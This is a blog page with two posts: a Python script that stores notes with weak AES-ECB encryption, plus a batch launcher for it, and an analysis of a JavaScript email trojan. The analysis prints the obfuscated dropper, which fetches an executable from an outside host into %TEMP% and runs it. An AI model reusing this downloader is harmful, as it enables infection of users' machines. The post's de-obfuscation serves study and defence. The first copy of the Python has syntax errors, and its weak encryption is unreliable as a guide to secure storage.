Adsense-HeaderAd-Script


Advertisement #Header

8 Nov 2024

Run a Python code by clicking (Windows)

 I will create a python code to encrpyt some sensitive information in a file. The code will collect a paraphrase from the user for each record, to generate a key to encrypt the info. And when user wants to retrieve the encrypted info, user must provide the paraphrase.

Python Code

secureStore.py

  
001
002
003
004
005
006
007
008
009
010
011
012
013
014
015
016
017
018
019
020
021
022
023
024
025
026
027
028
029
030
031
032
033
034
035
036
037
038
039
040
041
042
043
044
045
046
047
048
049
050
051
052
053
054
055
056
057
058
059
060
061
062
063
064
065
066
067
068
069
070
071
072
073
074
075
076
077
078
079
080
081
082
083
084
085
086
087
088
089
090
091
092
093
094
095
096
097
098
099
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
import os
import sys
 
try:
    from Crypto.Cipher import AES
except ModuleNotFoundError as me:
    print("pip3 install pycryptodome")
    raise
    exit()
 
from Crypto.Util.Padding import pad, unpad
from Crypto.Hash import SHA1
 
 
###  AES-128 Encrpytion and Decryption   ###
############################################
def encrypt(raw_bytes, key):
    # Create an AES cipher object with the key
    # and AES.MODE_ECB mode
    cipher = AES.new(key, AES.MODE_ECB)
    # Pad the raw_bytes and encrypt it
    padded = pad(raw_bytes, AES.block_size)
    ciphertext = cipher.encrypt(padded)
    return ciphertext
  
def decrypt(ciphertext, key):
    # Create an AES cipher object with the key 
    # and AES.MODE_ECB mode
    cipher = AES.new(key, AES.MODE_ECB)
    # Decrypt the ciphertext and remove the padding
    try:
        unpadded = cipher.decrypt(ciphertext)
        decrypted_data = unpad(unpadded, AES.block_size)
    except ValueError as ve:
        if hasattr(ve, 'message'):
            raise ValueError(e.message)
        else:
            raise ValueError(ve)
     
    return decrypted_data
 
 
###               Main                   ###
############################################
 
def create_key(txt):
    # Find the hash of the tezt
    hash = SHA1.new(txt.strip().encode('ASCII'))
 
    # Key-length accepted: 16, 24, and 32 bytes.
    keybytes = hash.digest()[:16
    return keybytes
 
def store(about, encinfo, fname='secured.lckr'):
    prefix='<rec>'
    suffix='</rec>'
    rec = f'\r\n{prefix}`{about}`{encinfo}`{suffix}'
 
    # get the current working directory
    cwd = os.getcwd()
    file_path = os.path.join(cwd,fname)
 
    # Open the file in write mode
    with open(file_path, 'a') as file:
        # Write content to the file
        file.write(rec)
        print("Saved")
  
   
def read_from_locker(filename='secured.lckr'):
    # get the current working directory
    cwd = os.getcwd()
    file_path = os.path.join(cwd,filename)
    whole_data = ""
    try:
        with open(file_path, 'r') as fp:
            whole_data = fp.readlines()
    except FileNotFoundError as fe:
        print(f'No records')
        exit()
    return whole_data
         
def list_rec():
    prefix='<rec>'
    suffix='</rec>'
    serial_number = 0
    records = []
    data_dump = read_from_locker();
     
    # List the records
    print("\nSl.", "\t", "About")
 
    for line in data_dump:
        if len(line) > (len(prefix) + len(suffix)):
            words = line.split('`')
            if( words[0].lstrip()==prefix and
                words[3].rstrip()==suffix
            ):
                records.append(words)
                print(serial_number, "\t", words[1])
                serial_number +=1
    return records
 
 
def get_sensitive_info(encrypted_info):
    try:
      paraphrase=input('Enter the paraphrase to retrieve the sensitive info:'
    except EOFError:
      exit()
    key = create_key(paraphrase)
    dcryptd_info = ""
 
    try:                       
        # Convert hex string to bytes object
        encr_bytes = bytes.fromhex(encrypted_info)
        # Decryption
        dcryptd_info = decrypt(encr_bytes, key)      
    except ValueError as ve:
        print(ve)
                   
    else:
        if isinstance(dcryptd_info, bytes):
             dcryptd_info = dcryptd_info.decode("ASCII")  
        print(f'info = {dcryptd_info}')
    try:
        input("\n Press any key to exit")
    except EOFError:
        exit()       
  
def select_rec():
    records = list_rec()
    print("Press any other key to Exit \n")
    try:
      rec_str=input('Select a Sl. to show sensitive info:')
      rec_id=int(rec_str)
    except Exception as e:
      exit()    
    except EOFError:
      exit()
 
    if(rec_id>=0 and rec_id<len(records)):
        get_sensitive_info(records[rec_id][2])
    else:
        print(f'Invalid Sl.')
  
def store_rec():
    try:
      paraphrase=input('Enter the paraphrase to encrypt the sensitive info:')
      senstv_info=input('Enter the sensitive info:')
      senstv_info = senstv_info.strip()
      about=input('Enter a name to identify:').strip()  
    except EOFError:
      exit()       
     
    key = create_key(paraphrase)  
 
    senstvInfoBytes = senstv_info.encode('ASCII')
 
    # Encryption
    encryptd_info = encrypt(senstvInfoBytes, key).hex()
 
    store(about, encryptd_info)
 
 
def main_menu():
    print("1. \t List Records")
    print("2. \t Store a Sensitive Info")
    print("Press any other key to Exit")
 
    try:
        menu_no = input('Select a menu number:')
        if(menu_no==1 or menu_no=='1'):
            select_rec()
        elif(menu_no==2 or menu_no=='2'):
            store_rec() 
        else:
            exit()
    except EOFError:
        exit()
 
 
##   Secure Store Main Menu
## ##########################
main_menu()
 

  
import os
import sys

try:
    from Crypto.Cipher import AES
except ModuleNotFoundError as me:
    print("pip3 install pycryptodome")
    raise
    exit()

from Crypto.Util.Padding import pad, unpad
from Crypto.Hash import SHA1


###  AES-128 Encrpytion and Decryption   ###
############################################
def encrypt(raw_bytes, key):
    # Create an AES cipher object with the key 
    # and AES.MODE_ECB mode
    cipher = AES.new(key, AES.MODE_ECB)
    # Pad the raw_bytes and encrypt it
    padded = pad(raw_bytes, AES.block_size)
    ciphertext = cipher.encrypt(padded)
    return ciphertext
 
def decrypt(ciphertext, key):
    # Create an AES cipher object with the key  
    # and AES.MODE_ECB mode
    cipher = AES.new(key, AES.MODE_ECB)
    # Decrypt the ciphertext and remove the padding
    try:
        unpadded = cipher.decrypt(ciphertext)
        decrypted_data = unpad(unpadded, AES.block_size)
    except ValueError as ve:
        if hasattr(ve, 'message'):
            raise ValueError(e.message)
        else:
            raise ValueError(ve)
    
    return decrypted_data


###               Main                   ###
############################################

def create_key(txt):
    # Find the hash of the tezt
    hash = SHA1.new(txt.strip().encode('ASCII'))

    # Key-length accepted: 16, 24, and 32 bytes.
    keybytes = hash.digest()[:16]  
    return keybytes

def store(about, encinfo, fname='secured.lckr'):
    prefix='<rec>'
    suffix='</rec>'
    rec = f'\r\n{prefix}`{about}`{encinfo}`{suffix}'

    # get the current working directory
    cwd = os.getcwd()
    file_path = os.path.join(cwd,fname)

    # Open the file in write mode
    with open(file_path, 'a') as file:
        # Write content to the file
        file.write(rec)
        print("Saved")
 
  
def read_from_locker(filename='secured.lckr'):
    # get the current working directory
    cwd = os.getcwd()
    file_path = os.path.join(cwd,filename)
    whole_data = ""
    try:
        with open(file_path, 'r') as fp:
            whole_data = fp.readlines()
    except FileNotFoundError as fe:
        print(f'No records')
        exit()
    return whole_data
        
def list_rec():
    prefix='<rec>'
    suffix='</rec>'
    serial_number = 0
    records = []
    data_dump = read_from_locker();
    
    # List the records
    print("\nSl.", "\t", "About")

    for line in data_dump:
        if len(line) > (len(prefix) + len(suffix)):
            words = line.split('`')
            if( words[0].lstrip()==prefix and
                words[3].rstrip()==suffix
            ):
                records.append(words)
                print(serial_number, "\t", words[1])
                serial_number +=1
    return records


def get_sensitive_info(encrypted_info):
    try:
      paraphrase=input('Enter the paraphrase to retrieve the sensitive info:')  
    except EOFError:
      exit()
    key = create_key(paraphrase)
    dcryptd_info = ""

    try:                        
        # Convert hex string to bytes object
        encr_bytes = bytes.fromhex(encrypted_info)
        # Decryption
        dcryptd_info = decrypt(encr_bytes, key)       
    except ValueError as ve:
        print(ve)
                  
    else:
        if isinstance(dcryptd_info, bytes):
             dcryptd_info = dcryptd_info.decode("ASCII")   
        print(f'info = {dcryptd_info}')
    try:
        input("\n Press any key to exit") 
    except EOFError:
        exit()        
 
def select_rec():
    records = list_rec()
    print("Press any other key to Exit \n")
    try:
      rec_str=input('Select a Sl. to show sensitive info:')
      rec_id=int(rec_str)
    except Exception as e:
      exit()     
    except EOFError:
      exit()

    if(rec_id>=0 and rec_id<len(records)):
        get_sensitive_info(records[rec_id][2])
    else:
        print(f'Invalid Sl.')
 
def store_rec():
    try:
      paraphrase=input('Enter the paraphrase to encrypt the sensitive info:')
      senstv_info=input('Enter the sensitive info:')
      senstv_info = senstv_info.strip()
      about=input('Enter a name to identify:').strip()   
    except EOFError:
      exit()        
    
    key = create_key(paraphrase)   

    senstvInfoBytes = senstv_info.encode('ASCII')

    # Encryption
    encryptd_info = encrypt(senstvInfoBytes, key).hex()

    store(about, encryptd_info) 


def main_menu():
    print("1. \t List Records")
    print("2. \t Store a Sensitive Info")
    print("Press any other key to Exit")

    try:
        menu_no = input('Select a menu number:')
        if(menu_no==1 or menu_no=='1'):
            select_rec()
        elif(menu_no==2 or menu_no=='2'):
            store_rec()  
        else:
            exit()
    except EOFError:
        exit()


##   Secure Store Main Menu
## ##########################
main_menu()


Execute the Python Code

To execute the above code, we must do the following steps
1. Open the Command Prompt
2. Change the directory to where this code exists.
3. Type 
python secureStore.py

This is hard and need to know little commands to navigate in command prompt.

The easiest way would be to just double click on a file and boom our code is up and running.

Well to do that, we need to create a batch script.

Batch Script


secureStore.bat

  
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
@ECHO OFF
SETLOCAL ENABLEEXTENSIONS
SETLOCAL ENABLEDELAYEDEXPANSION
REM ENABLEDELAYEDEXPANSION would allow !var! to expand
REM  the  variable var at execution time.
REM The variables is usually expanded at input time,
REM  but when inside of a FOR loop,
REM  its assigned with value during initialization.
REM This expansion of variable at the input time,
REM  causes counter variables not to increment
REM  or decrement in FOR loop.
 
REM Parent Directory of secureStore Code
SET parent=%~dp0
 
REM  Get the path of python executable
REM  If more than one path of python.exe exists,
REM  select the 1st one
SET /A once=0
FOR /F "usebackq delims=" %%i IN (`where python.exe`) DO (
    IF /I !once! EQU 0 (       
        SET pyPath=%%i
        SET /A once=1
    )  
)
REM echo %pyPath%
cd %parent%
 
REM For supporting “double-click” execution
REM  from Windows Explorer
SET /A noninteractive=0
ECHO %CMDCMDLINE% | FINDSTR /L /I %parent% >NUL 2>&1
IF %ERRORLEVEL% == 0 SET /A noninteractive=1
 
REM Run the app
"%pyPath%" secureStore.py
 
IF ERRORLEVEL 1 (
 REM If Some Error occured running the app
 REM Re Run the app to capture the error
 "%pyPath%" secureStore.py 2>NUL | findstr /LI "pip3 install pycryptodome"
 IF ERRORLEVEL 0 (
  REM If Crypto module is not installed
  ECHO Installing Crypto Library
  pip3 install pycryptodome
 
  IF ERRORLEVEL 0 (
    REM After successful installation of Crypto Library
    REM Run the app again
    "%pyPath%" secureStore.py
  )
 )     
)
 
 
IF /I !noninteractive! EQU 1 (
 REM Paused the CMD.exe to show the output before exiting
 REM For bat script, double clicked from Win Explorer
 PAUSE
)
 
ENDLOCAL
EXIT /B 0
 

  
@ECHO OFF
SETLOCAL ENABLEEXTENSIONS 
SETLOCAL ENABLEDELAYEDEXPANSION
REM ENABLEDELAYEDEXPANSION would allow !var! to expand 
REM  the  variable var at execution time.
REM The variables is usually expanded at input time, 
REM  but when inside of a FOR loop, 
REM  its assigned with value during initialization.
REM This expansion of variable at the input time, 
REM  causes counter variables not to increment 
REM  or decrement in FOR loop.

REM Parent Directory of secureStore Code
SET parent=%~dp0

REM  Get the path of python executable
REM  If more than one path of python.exe exists, 
REM  select the 1st one
SET /A once=0
FOR /F "usebackq delims=" %%i IN (`where python.exe`) DO (
    IF /I !once! EQU 0 (        
        SET pyPath=%%i
        SET /A once=1
    )   
)
REM echo %pyPath%
cd %parent%

REM For supporting “double-click” execution 
REM  from Windows Explorer
SET /A noninteractive=0
ECHO %CMDCMDLINE% | FINDSTR /L /I %parent% >NUL 2>&1
IF %ERRORLEVEL% == 0 SET /A noninteractive=1

REM Run the app
"%pyPath%" secureStore.py

IF ERRORLEVEL 1 (
 REM If Some Error occured running the app
 REM Re Run the app to capture the error
 "%pyPath%" secureStore.py 2>NUL | findstr /LI "pip3 install pycryptodome"
 IF ERRORLEVEL 0 (
  REM If Crypto module is not installed
  ECHO Installing Crypto Library
  pip3 install pycryptodome

  IF ERRORLEVEL 0 (
    REM After successful installation of Crypto Library
    REM Run the app again
    "%pyPath%" secureStore.py
  )
 )      
)


IF /I !noninteractive! EQU 1 (
 REM Paused the CMD.exe to show the output before exiting 
 REM For bat script, double clicked from Win Explorer
 PAUSE
)

ENDLOCAL
EXIT /B 0

Place this batch script in the same folder as python code. Also create a shortcut for this batch script in Desktop, Programs Menu, etc.

Double click the icon of secureStore.bat

Now when you double click on the secureStore.bat or its shortcut, it will execute the python code and show in command prompt.

Command prompt Output

Understanding the Batch Script

Line 1: @ECHO OFF : This instruction prevents cmd.exe from displaying all the batch commands that is executed. Without @ECHO OFF,  the output would be like the image below

image of output without @echo off


Line 20: FOR /F "usebackq delims=" %%i IN (`where python.exe`) DO ( 

It parses the output of the command inside the IN () block and for each output line, the DO () block is executed. 

usebackq option specifies that  `backquoted text` is executed as command, 'single quoted text' as literal string and "double quoted text" as filenames.

delims=NULL option specifies that output is not tokenised using any delimiter, so the output is passed as a whole line.

%%i is the variable which stores the output line for each output line iterated.

Line 21: IF /I !once! EQU 0 (

This instruction checks if once variable equals to 0, if true run the command in (commands) block

Line 32: ECHO %CMDCMDLINE% | FINDSTR /L /I %parent% >NUL 2>&1 

%CMDCMDLINE% is built-in variable that contains the path of the command which invoked the  cmd.exe. IF a batch script is executed from already running cmd.exe then  CMDCMDLINE value would be "C:\Windows\System32\cmd.exe" and  if the batch script was run by double-clicking on it, then CMDCMDLINE would be "C:\WINDOWS\system32\cmd.exe /c ""\projects\SecureStoreApp\secureStore.bat" ""

The '|' pipe operator is to pass the output of  the LHS command to as an input of the RHS command.

FINDSTR command searches for the value in parent variable in the CMDCMDLINE variable and if its not found, then built-in ERRORLEVEL variable is set as 1  or else the ERRORLEVE variable is assigned 0 (success).

/I option makes the search case-insensitive.

/L option instructs to use the search string literally instead of as any regular expression string.

>NUL 2>&1  instructs the outputs from the FINDSTR to be redirected to NULL file descriptor  and also the instructs the STDERR output to be redirected to STDOUT (where STDOUT is already redirected to NULL). So this instructs no output to be displayed for this line command.

Line 41-45:  If running the python code, throws an error since a module is not found, then FINDSTR is used to find the exact module  not available and try to install that library required.


4 Apr 2016

Learned Javscript from a Trojan got through ZIP Mail Attachment


I received a mail to my company account from my mail itself. And I was pretty sure that I haven’t sent a mail to myself. So I checked the Header of the email, it was shown that it’s from a unknown source.


Now I was pretty convinced that this is a rogue email that may contain some kind of malicious code. The mail had an attachment containing  a file called “Image917524490855.zip”. 



I was curious to know what was inside and how it could infect my computer.  After extracting the zip file, I found it was containing a JS file. So now I wanted to know, how a JavaScript file could contain infect my system with virus.


Boy, I gotta to tell if you want to learn cool, innovative model of coding and learn new things, you go through the codebase of a virus.


I'm breaking down the code to small snippets to understand what going on it and have commented inside the code its meaning and current variable value and unfamilar command's syntax.

To see the full codebase, please check the github page here


?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
thickI = 0;
String.prototype.millinery = function() {
    aa = this;
    return aa.charAt(8 * 0 * 8); // returns the Strings characterAT(0); that is first character
};
var BilRTKUok = [
    "p" + ("italy", "navel", "squatter", "ST") + "FV" + ("lassie", "monopolize", "neighborhood", "YI") + "rjX",
    "o" + "Gyfv" + "yW" + "IH" + ("crossroads", "hybrid", "stingy", "interlude", "hQ"),
    "E" + ("keyboard", "tandem", "gotten", "listen", "xp") + "an" + ("keith", "vestige", "input", "heinous", "dE") + "nv" + "ir" + ("septuagint", "bookkeeper", "greece", "scimitar", "on") + "me" + ("patio", "unleavened", "nt") + ("garnered", "adrift", "St") + ("performance", "yahoo", "ri") + ("voices", "mexico", "ngs"),
    "" + "%" + ("burdett", "tongs", "TE") + ("travail", "inserted", "MP%"),
    "" + "." + ("followed", "casting", "second", "exe"),
    ("including", "enemy", "R") + "un",
    ("chronology", "alexandra", "nightmare", "helicopter", "A") + "ct" + "co" + "ndoi" + "vc" + ("ranks", "homogeneous", "sudan", "decorate", "ondo") + "eX" + ("sediment", "forces", "preparation", "graphs", "cond") + "oO" + "bc" + ("revealed", "isolate", "malta", "macintosh", "on") + "do" + ("enhance", "install", "jecond") + "oct",
    "nlHcwmmYdvD",
    "HCpQSg",
    "W" + "Sc" + "co" + "nd" + "or" + "ip" + "tc" + ("commissioner", "papua", "spalding", "tasting", "on") + "do." + ("manslaughter", "fiftyfive", "workstation", "halter", "S"),
    "LVEhhuKWtV",
    ("convergence", "lamentation", "abstracts", "lynching", "hco") + "ndoe" + "lc" + "on" + ("playback", "quench", "doing", "ballet", "dol"),
    "BHyXGt",
    "V" + ("informer", "parrot", "redeem", "me") + "VY" + ("colin", "reprint", "tropical", "VS"),
    ("durable", "mention", "provisional", "shuttle", "McondoSXc") + ("naming", "facility", "on") + ("scamp", "privy", "doMLcond") + "o2" + ("ordinance", "distributed", "mediator", "delinquent", ".") + "co" + ("wellbred", "misshapen", "nd") + "oXMc" + "on" + ("unsaid", "leather", "jenny", "animus", "doLH") + ("pyramids", "contribution", "co") + ("extend", "suppliers", "treasury", "furniture", "nd") + "oTTP"
                 
                ];    // see img BilRTKUok-01.JPG
thickI = 0;
String.prototype.millinery = function() {
    aa = this;
    return aa.charAt(8 * 0 * 8); // returns the Strings characterAT(0); that is first character
};
var BilRTKUok = [
    "p" + ("italy", "navel", "squatter", "ST") + "FV" + ("lassie", "monopolize", "neighborhood", "YI") + "rjX", 
    "o" + "Gyfv" + "yW" + "IH" + ("crossroads", "hybrid", "stingy", "interlude", "hQ"), 

    "E" + ("keyboard", "tandem", "gotten", "listen", "xp") + "an" + ("keith", "vestige", "input", "heinous", "dE") + "nv" + "ir" + ("septuagint", "bookkeeper", "greece", "scimitar", "on") + "me" + ("patio", "unleavened", "nt") + ("garnered", "adrift", "St") + ("performance", "yahoo", "ri") + ("voices", "mexico", "ngs"), 

    "" + "%" + ("burdett", "tongs", "TE") + ("travail", "inserted", "MP%"), 
    "" + "." + ("followed", "casting", "second", "exe"), 
    ("including", "enemy", "R") + "un", 

    ("chronology", "alexandra", "nightmare", "helicopter", "A") + "ct" + "co" + "ndoi" + "vc" + ("ranks", "homogeneous", "sudan", "decorate", "ondo") + "eX" + ("sediment", "forces", "preparation", "graphs", "cond") + "oO" + "bc" + ("revealed", "isolate", "malta", "macintosh", "on") + "do" + ("enhance", "install", "jecond") + "oct", 

    "nlHcwmmYdvD", 
    "HCpQSg", 

    "W" + "Sc" + "co" + "nd" + "or" + "ip" + "tc" + ("commissioner", "papua", "spalding", "tasting", "on") + "do." + ("manslaughter", "fiftyfive", "workstation", "halter", "S"), 

    "LVEhhuKWtV", 

    ("convergence", "lamentation", "abstracts", "lynching", "hco") + "ndoe" + "lc" + "on" + ("playback", "quench", "doing", "ballet", "dol"), 

    "BHyXGt", 

    "V" + ("informer", "parrot", "redeem", "me") + "VY" + ("colin", "reprint", "tropical", "VS"), 
    ("durable", "mention", "provisional", "shuttle", "McondoSXc") + ("naming", "facility", "on") + ("scamp", "privy", "doMLcond") + "o2" + ("ordinance", "distributed", "mediator", "delinquent", ".") + "co" + ("wellbred", "misshapen", "nd") + "oXMc" + "on" + ("unsaid", "leather", "jenny", "animus", "doLH") + ("pyramids", "contribution", "co") + ("extend", "suppliers", "treasury", "furniture", "nd") + "oTTP"
                
                ];    // see img BilRTKUok-01.JPG

line 06: EvenThough there is lot of words and unintelligent words in BilRTKUok Array, after the execution of the array, it becomes like the below Fig: BilRTKUok-01.JPG.

BilRTKUok Array Snapshot
Fig: BilRTKUok-01.JPG

?
BilRTKUok.splice(7, thickI + 2);   // After splice removes 2 items; see img BilRTKUok-02.JPG
BilRTKUok.splice(7, thickI + 2);   // After splice removes 2 items; see img BilRTKUok-02.JPG

After the splicing of the BilRTKUok array, it becomes as shown in below Fig: BilRTKUok-02.JPG

Snapshot of BilRTKUok array after splice
Fig: BilRTKUok-02.JPG

?
35
36
37
38
39
40
41
42
43
44
45
amino = BilRTKUok[1 + 4 + 1].split("condo").join("");  // = "ActiveXObject"
//var WUHOHMfe = this["ActiveXObject"];
var WUHOHMfe = this[amino];
statement = (("savings", "perfidy", "qHgSeaxuhoE", "hormone", "pSCfJszNMe") + "xJwXsnxn").millinery();           // statement = "p"
announcements = (("linking", "scholastic", "JgndJbrQuz", "timely", "shWLaSRGCWke") + "MRkwwfHjVT").millinery(); //  announcements = "s"
thickI = 7;
BilRTKUok[thickI] = BilRTKUok[thickI] + BilRTKUok[thickI + 2];   // BilRTKUok[7] = "WSccondoriptcondo.Shcondoelcondol"
BilRTKUok[thickI + 1] = "kAgWlwsNfXY";                          //  BilRTKUok[8] = "kAgWlwsNfXY"
BilRTKUok.splice(thickI + 1, thickI - 4);   // After splice removes 2 items; see img BilRTKUok-03.JPG
amino = BilRTKUok[1 + 4 + 1].split("condo").join("");  // = "ActiveXObject"

//var WUHOHMfe = this["ActiveXObject"]; 
var WUHOHMfe = this[amino]; 
statement = (("savings", "perfidy", "qHgSeaxuhoE", "hormone", "pSCfJszNMe") + "xJwXsnxn").millinery();           // statement = "p"
announcements = (("linking", "scholastic", "JgndJbrQuz", "timely", "shWLaSRGCWke") + "MRkwwfHjVT").millinery(); //  announcements = "s"

thickI = 7;
BilRTKUok[thickI] = BilRTKUok[thickI] + BilRTKUok[thickI + 2];   // BilRTKUok[7] = "WSccondoriptcondo.Shcondoelcondol"
BilRTKUok[thickI + 1] = "kAgWlwsNfXY";                          //  BilRTKUok[8] = "kAgWlwsNfXY"
BilRTKUok.splice(thickI + 1, thickI - 4);   // After splice removes 2 items; see img BilRTKUok-03.JPG


line 36 : The ActiveXObject object is used to create instances of OLE Automation objects in Internet Explorer on Windows operating systems.

Several applications (Microsoft Office Word, Microsoft Office Excel, Windows Media Player, ...) provide OLE Automation objects to allow communication with them. You can use the methods and properties supported by Automation objects in JavaScript.

Luckily, the ActiveXObject object is only supported by Internet Explorer. To know more on ActiveXObject, check this site

line 57 : After this code, the Array becomes as shown in the Fig:ilRTKUok-03.JPG below


Fig: BilRTKUok-03.JPG


?
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
BilRTKUok[thickI] = BilRTKUok[thickI].split("condo").join("");   // "WSccondoriptcondo.Shcondoelcondol" is converted to "WScript.Shell"
//var yzavYsf = new ActiveXObject("WScript.shell");
var yzavYsf = new WUHOHMfe(BilRTKUok[thickI]);
thickI++;                                               // thickI = 8
BilRTKUok[thickI + 1] = BilRTKUok[thickI + 1].split("condo").join("");  // "McondoSXcondoMLcondo2.condoXMcondoLHcondoTTP" becomes "MSXML2.XMLHTTP"
//var QcarAWR = new ActiveXObject("MSXML2.XMLHTTP");
var QcarAWR = new WUHOHMfe(BilRTKUok[1 + thickI]);
thickI /= 2;                // thickI = 4
//var xAbMqtec = WshShell.ExpandEnvironmentStrings("%TEMP%")
var xAbMqtec = yzavYsf[BilRTKUok[thickI - 2]](BilRTKUok[thickI - 1]);
corporatee = (( "mechanics", "seraphic", "TyEzvHbHt", "disorders", "ElpAWvfz") + "TpDEqAkzD").millinery();   // corporatee = "E"
BilRTKUok[thickI] = BilRTKUok[thickI].split("condo").join("");   // "WSccondoriptcondo.Shcondoelcondol" is converted to "WScript.Shell"

//var yzavYsf = new ActiveXObject("WScript.shell");
var yzavYsf = new WUHOHMfe(BilRTKUok[thickI]);
thickI++;                                               // thickI = 8
BilRTKUok[thickI + 1] = BilRTKUok[thickI + 1].split("condo").join("");  // "McondoSXcondoMLcondo2.condoXMcondoLHcondoTTP" becomes "MSXML2.XMLHTTP"

//var QcarAWR = new ActiveXObject("MSXML2.XMLHTTP"); 
var QcarAWR = new WUHOHMfe(BilRTKUok[1 + thickI]);
thickI /= 2;                // thickI = 4

//var xAbMqtec = WshShell.ExpandEnvironmentStrings("%TEMP%") 
var xAbMqtec = yzavYsf[BilRTKUok[thickI - 2]](BilRTKUok[thickI - 1]); 


corporatee = (( "mechanics", "seraphic", "TyEzvHbHt", "disorders", "ElpAWvfz") + "TpDEqAkzD").millinery();   // corporatee = "E"




line 48 :   What is WSH?    WSH is a script host. A script host is a program that provides an environment in which users can execute scripts in a variety of languages, languages that use a variety of object models to perform tasks.  To Read more, check this site

The WshShell object gives your scripts the ability to work with the Windows shell. Your scripts can use the WshShell object to perform a number of system administration tasks, including running programs, reading from and writing to the registry, and creating shortcuts.

line 53 : The MSXML2.XMLHTTP is the XML HTTP Request Object used to call Server APIs Asynchronously.

line 57 : The ExpandEnvironmentStrings method expands the environment variables in a string and returns the resulting string. Here its gives the absolute path of %TEMP% .To know more, check this site
?
113
screensaver("h" + "tt" + ("photographic", "baleful", "formality", "p:") + "//" + "de" + "v." + "fa" + "nj" + "ap" + "an" + ".c" + ("edification", "goodfellowship", "om") + "/7" + "62" + "tr" + "g22e" + "2." + "exe", "FfXlke");
screensaver("h" + "tt" + ("photographic", "baleful", "formality", "p:") + "//" + "de" + "v." + "fa" + "nj" + "ap" + "an" + ".c" + ("edification", "goodfellowship", "om") + "/7" + "62" + "tr" + "g22e" + "2." + "exe", "FfXlke");

line 113 : Don't let the function name decieve you, its no screensaver function.  In summary this custom function will call  the server api and download the contents of virus codebase to a file and tells the system to run that file.

?
063
064
065
066
067
068
069
070
071
072
073
074
075
076
077
078
079
080
081
082
083
084
085
086
087
088
089
090
091
092
093
094
095
096
097
098
099
100
101
102
103
104
105
106
107
108
109
110
111
112
function screensaver(aristocrat, welter) {
// aristocrat = "http ://dev.fanjapan.com/762trg22e2 .exe" // Virus!  dont click unless you are Batman who confronts his worst Fear (here Virus)
// welter = "FfXlke"
    try {
        var transmit = xAbMqtec + "/" + welter + BilRTKUok[thickI];   //  = "%TEMP%/FfXlke.exe"
        var open ="o" + statement + corporatee + "n";                //   = "opEn"
        var meth= ("improvement", "tardily", "G") + corporatee + ("rocco", "grapple", "tillage", "T"); // = "GET"
         
        // MSXML2.XMLHTTP.open("GET","http ://dev.fanjapan.com/762trg22e2 .exe", false);
        QcarAWR[open](meth, aristocrat, false);
         
        var func2= announcements + ("tuition", "glinting", "unfounded", "arctic", "e") + (("unholy", "curbed", "LLpUmwQBnsk", "spurn", "kissing", "nGDOpiDLl") + "FKfAxgifRdX").millinery() + (("computer", "snail", "races", "leicestershire", "archive", "dEAqcmjkU") + "KpOALvGVT").millinery();  // = send
        QcarAWR[func2]();  // MSXML2.XMLHTTP.send();
         
        if (QcarAWR.status == 200) {
            var func3 = (("calibre", "hilton", "collectibles", "skating", "") + "A" + ("realistic", "invitations", "vulcan", "pO") + "DB." + "" + "S" + ("dwindle", "homework", "centered", "tr") + ("athletics", "dresses", "eam")).replace("p", "D");  // = "ADODB.Stream"
             
            // var hytSjp = new ActiveXObject("ADODB.Stream");
            var hytSjp = new WUHOHMfe(func3);
             
            var func4 = "" + "o" + ("fraternity", "manner", "simplified", "consent", "pen");    // = "open"
            
           //ADODB.Stream.open();
            hytSjp[func4]();
             
            hytSjp.type = 0 + 3 - 2; // ADODB.Stream.type = 1
            var func5 = "w" + ("targets", "limply", "shell", "ri") + "te" // = write
            var func6 = "" + ("numeral", "drawl", "tasteful", "R") + "es" + ("defender", "typewriter", "accumulates", "necessitate", "pon") + announcements + ("carolina", "ravage", "malediction", "e") + "Bo" + "dy";   // = "ResponseBody"
             
            //ADODB.Stream.write(MSXML2.XMLHTTP.ResponseBody);
            hytSjp[func5](QcarAWR[func6]);
             
            var func7 = (statement + "o" + "Di" + ("bracelet", "beast", "cheaper", "ti") + "on").replace("D", announcements); // = position
            hytSjp[func7] = 0;  // ADODB.Stream.position = 0
           var func8="s" + "av" + "eT" + ("scrimmage", "alliance", "oFile");  // = saveToFile
            
           // ADODB.Stream.saveToFile(FileName, adSaveCreateOverWrite);
            hytSjp[func8](transmit, 2);
            hytSjp.close();  // ADODB.Stream.close();
             
            //WScript.Shell.Run(strCommand, [intWindowStyle], [bWaitOnReturn])
            yzavYsf[BilRTKUok[thickI + 1]](transmit, 1, "TPYHPf" === "LDNSGABujeo");  // "TPYHPf" === "LDNSGABujeo"  means false
        }
    }
    catch (cNINLnxTF) {
    console.log(cNINLnxTF);
    };
}
function screensaver(aristocrat, welter) {
// aristocrat = "http ://dev.fanjapan.com/762trg22e2 .exe" // Virus!  dont click unless you are Batman who confronts his worst Fear (here Virus)
// welter = "FfXlke"
    try {
        var transmit = xAbMqtec + "/" + welter + BilRTKUok[thickI];   //  = "%TEMP%/FfXlke.exe"
        var open ="o" + statement + corporatee + "n";                //   = "opEn"
        var meth= ("improvement", "tardily", "G") + corporatee + ("rocco", "grapple", "tillage", "T"); // = "GET"
        
        // MSXML2.XMLHTTP.open("GET","http ://dev.fanjapan.com/762trg22e2 .exe", false);
        QcarAWR[open](meth, aristocrat, false);
        
        var func2= announcements + ("tuition", "glinting", "unfounded", "arctic", "e") + (("unholy", "curbed", "LLpUmwQBnsk", "spurn", "kissing", "nGDOpiDLl") + "FKfAxgifRdX").millinery() + (("computer", "snail", "races", "leicestershire", "archive", "dEAqcmjkU") + "KpOALvGVT").millinery();  // = send
        QcarAWR[func2]();  // MSXML2.XMLHTTP.send();
        
        if (QcarAWR.status == 200) {
            var func3 = (("calibre", "hilton", "collectibles", "skating", "") + "A" + ("realistic", "invitations", "vulcan", "pO") + "DB." + "" + "S" + ("dwindle", "homework", "centered", "tr") + ("athletics", "dresses", "eam")).replace("p", "D");  // = "ADODB.Stream"
            
            // var hytSjp = new ActiveXObject("ADODB.Stream");
            var hytSjp = new WUHOHMfe(func3);
            
